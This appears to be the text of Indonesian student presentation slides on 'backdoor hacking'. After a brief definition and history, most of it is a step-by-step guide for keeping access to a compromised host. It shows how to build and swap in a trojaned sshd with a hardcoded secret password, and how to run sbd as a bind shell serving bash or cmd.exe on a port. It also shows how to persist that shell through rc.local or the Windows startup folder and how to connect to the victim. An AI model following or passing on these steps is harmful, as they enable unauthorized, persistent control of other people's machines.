Backdoor Hacking Amellia Aquariesta (7405.040.001) Abi Sugeng Ariyanto (7405.040.011) Apa Itu Backdoor ? Backdoor atau "pintu belakang", dalam keamanan sistem komputer, merujuk kepada mekanisme yang dapat digunakan untuk mengakses sistem, aplikasi, atau jaringan, selain dari mekanisme yang umum digunakan (melalui proses logon atau proses autentikasi lainnya). (Wikipedia) Latar Belakang Backdoor pada awalnya dibuat oleh para programer komputer sebagai mekanisme yang mengizinkan mereka untuk memperoleh akses khusus ke dalam program mereka, seringnya digunakan untuk membenarkan dan memperbaiki kode di dalam program yang mereka buat ketika sebuah crash akibat bug terjadi. Latar Belakang Kenneth Thompson (salah seorang pemrogram sistem operasi UNIX membuat sebuah program proses login pada tahun 1983 ketika memperoleh Turing Award), selain program login umum digunakan dalam sistem operasi UNIX dengan menggunakan bahasa pemrograman C, sehingga ia dapat mengakses sistem UNIX yang berjalan di dalam jaringan internal Bell Labs. Backdoor dalam Hacker Backdoor dalam dunia hacker memiliki arti mebuat pintu belakang apabila akan meninggalkan host yang sudah dimasuki. pintu ini berupa password login. Backdoor ini berguna apabila cracker ingin kembali ke host / server tersebut, karena apabila password root atau admin telah diganti, kita masih bisa masuk menggunakan password backdoor yang telah dipasang. Toolbackdoor sshbd sdb SSHBD Instalasi sshbd asumsi ini setelah kita masuk host target. Extrak file sshbd.tgz. Edit file version.h Ubah password backdoor sesuai keinginan anda dengan melakukan pengeditan pada file includes.h #define _SECRET_PASSWD "asdfg123" Setelah semua beres, mulai lakukan installasi misal sebagai berikut : (Hanya SEMISAL SAJA, gunakan kreatifitas anda oke!!) #define SSH_VERSION "OpenSSH_4.2" SSHBD [root@target]#./configure --prefix=/usr/local/sshd/ (Tunggu sampai selesai) [root@target]#make;make install (Tunggu sampai selesai) [root@target]#ps -axu|grep /sbin/sshd Warning: bad ps syntax, perhaps a bogus ‘-’? See http://procps.sf.net/faq.html root 3380 0.0 0.6 4272 1576 ? Ss 13:15 0:00 /usr/sbin/sshd root 4903 0.0 0.2 2032 664 pts/5 S+ 16:56 0:00 grep /sbin/sshd [root@target]#kill -9 3380;mv /usr/sbin/sshd . [root@target]#cp /usr/local/sshd/sbin/sshd /usr/sbin/sshd [root@target]#chmod +x /usr/sbin/sshd;kill -HUP `cat /var/run/sshd.pid` SSHBD Selesai installasi, sekarang coba anda login dari box anda ke box backdoor dengan [root@aku]#ssh [email protected] (Ini adalah IP box backdoor) password : <enter> blablabla [root@target]# Password diatas diisikan password backdoor yang diisikan SBD di Linux --1 Membuat backdoor di LINUX Extract sbd-1.37 (tar –xzvf….) make unix ./sdb –l –p <port> -e bash –v –ro –Don Buat file utk menjalankan backdoor, agar backdoor tetap bisa aktif meskipun komputer korban di restart. Contoh filenya : xx.pl: #!/bin/bash cd /root/backdoor/sbd-1.37/ (tempat sbd-137 diextract) ./sbd -l -p 123 -e bash -Don -v -r0 copy-kan isi file xx.pl isi ke /etc/rc.local SBD di Windows --1 Membuat backdoor di Windows make cygwin copy paket sbd.exe sdb -l -p <nmr port> -e cmd.exe -v -ro Buat file utk menjalankan backdoor, agar backdoor tetap bisa aktif meskipun komputer korban di restart. Contoh filenya : xx.bat: @echo off cd.. //asumsi paket sbd ada pd C: cd.. sbd -l -p 241 -e cmd.exe -v -ro exit Taruh file xx.bat di startup SBD Menghack lewat Linux dan Windows sbd –v <ip_korban> <port>